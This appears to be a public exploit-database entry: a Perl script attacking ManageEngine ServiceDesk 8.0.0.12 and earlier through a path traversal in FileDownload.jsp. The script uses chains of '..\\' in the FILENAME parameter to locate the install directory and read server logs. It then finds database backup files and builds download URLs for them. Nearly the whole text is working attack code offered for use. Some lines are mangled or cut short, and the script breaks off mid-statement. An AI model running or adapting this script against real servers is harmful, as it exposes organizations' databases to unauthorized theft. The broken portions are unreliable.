# Exploit Title: ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure # Google Dork: none # Date: 07.07.2011 # Author: @ygoltsev # Software Link: http://www.manageengine.com/ # Version: <=8.0.0.12 # Tested on: Windows # CVE : None #!/usr/bin/perl use LWP::UserAgent; use File::stat; $ptxt=" ################################################# # _____ _ ____ _ #| __|___ ___ _ _|_|___ ___| \ ___ ___| |_ #|__ | -_| _| | | | _| -_| | | -_|_ -| '_| #|_____|___|_| \_/|_|___|___|____/|___|___|_,_| # ################################################# [0-day] [Database disclosure] [desc: Exploit for ServiceDesk v *.* OS: Windows] "; print $ptxt; $ua=LWP::UserAgent->new(); $url="http://127.0.0.1"; $path="/workorder/FileDownload.jsp"; $installPath=&getInstallPathWin($url,$path); if ($installPath ne "") { @backups=&getServerOutLogs($url,$path,$installPath); } else { print "Install path not found :(\n"; exit(); } if (scalar(@backups)>0) { print "hehe.. We got paths to backup files..\n If they are on the same drive and exists - we will own their world!!\n"; foreach $backLine (@backups) { @backInfo=split(/ --- /,$backLine); #print "Trying to download $backInfo[1] from $backInfo[0]...\n"; &downloadBackups($url,$path,$backLine); } } unlink("bad"); print "Dude, check out \'db_backups.html\'\n"; sub downloadBackups { my ($url,$path,$backLine) = @_; @backInfo=split(/ --- /,$backLine); $backupUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\ ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ ..\\..\\..\\..\\$backInfo[0]$backInfo[1]"; #$br=$ua->get($backupUrl); #if ($br->is_success) { # open(A,">$backInfo[1]"); # print A $br->content; # close(A); #} open(A,">>db_backups.html"); print A "$backInfo[1]
\n"; close(A); } sub getServerOutLogs { my ($url,$path,$installPath) = @_; $badUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\ \..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\ \..\\..\\..\\${installPath}server\\default\\log\\serverout11111111111${i}.tx t"; $br=$ua->get($badUrl); if ($br->is_success) { open(A,">bad"); print A $br->content; close(A); } for ($i=0;$i<=10;$i++) { $logUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\ \..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\ \..\\..\\..\\${installPath}server\\default\\log\\serverout${i}.txt"; $br=$ua->get($logUrl); if ($br->is_success) { open(A,">${i}.txt"); print A $br->content; close(A); if (stat("bad")->size!=stat("${i}.txt")->size) { } else { unlink("${i}.txt"); } } } for ($i=0;$i<=10;$i++) { if (-e "${i}.txt") { open(A,"${i}.txt"); @log=; close(A); foreach $line (@log) { if ($line=~/: Build number(.*): ([0-9]+)\|/) { $tBuild=$2; if ($sdBuild eq "") { $sdBuild=$tBuild; } } if ($line=~/\[([0-9]+):([0-9]+):([0-9]+):([0-9]+)\]\|\[([0-9]+)-([0-9]+)-([0-9] +)\]\|\[SYSOUT\](.*)BACKUPDIR=(.*), ATTACHMENT=/) { push(@backups,"$9 --- backup_servicedesk_XBUILDX_database_${5}_${6}_${7}_${1}_${2}.data"); } } unlink("${i}.txt"); } } if (scalar(@backups)>0) { print "Man, you are realy lucky! We found some info about ServiceDesk backups..\nBUT, I need your help now, hehe\nLet's construct directories!\np.s. type without drive letter, like \\backup\\\n"; } else { print "Bad luck.. Check your karma, seriously..Where is my fucking latte!?!?\np.s. No info about backups was found :("; exit(); } foreach $mb (@backups) { $mb=~s/XBUILDX/$sdBuild/gi; @dir=split(/ --- /,$mb); print "Trash Dir: $dir[0]\n"; print "Right Dir: "; chomp($rDir=); if ($rDir ne "") { $fullDB=$dir[1]; $fullDB=~s/database/fullbackup/gi; push(@backupFiles,"$rDir --- $dir[1]"); push(@backupFiles,"$rDir --- $fullDB"); } } return @backupFiles; } sub getInstallPathWin { my ($url,$path) = @_; $url1="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\. .\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\. .\\..\\..\\"; @paths=("ServiceDesk\\","ManageEngine\\ServiceDesk\\"); @checkFiles=("dashgjifyq8412348fhsjfghjqw.txt","COPYRIGHT","logs\\configport .txt","bin\\run.bat","server\\default\\log\\boot.log"); $i=0; foreach $p (@paths) { $k=0; foreach $f (@checkFiles) { $checkUrl="${url1}${p}${f}"; $br=$ua->get($checkUrl); if ($br->is_success) { open(A,">${i}${k}"); print A $br->content; close(A); } $k++; } $i++; } for ($i=0;$isize; } else { if (stat("${i}${k}")->size!=$incorrectSize) { $ok++; } } } } if ($ok>0) { if ($ok==4) { print "You are lucky! \nServiceDesk installed to: $paths[$i]\n"; $ret=$paths[$i]; } elsif ($ok>2) { print "I think ServiceDesk installed to: $paths[$i]\n"; $ret=$paths[$i]; } elsif ($ok>1) { print "You are lucky if ServiceDesk installed to: $paths[$i]\n"; $ret=$paths[$i]; } } } for ($i=0;$i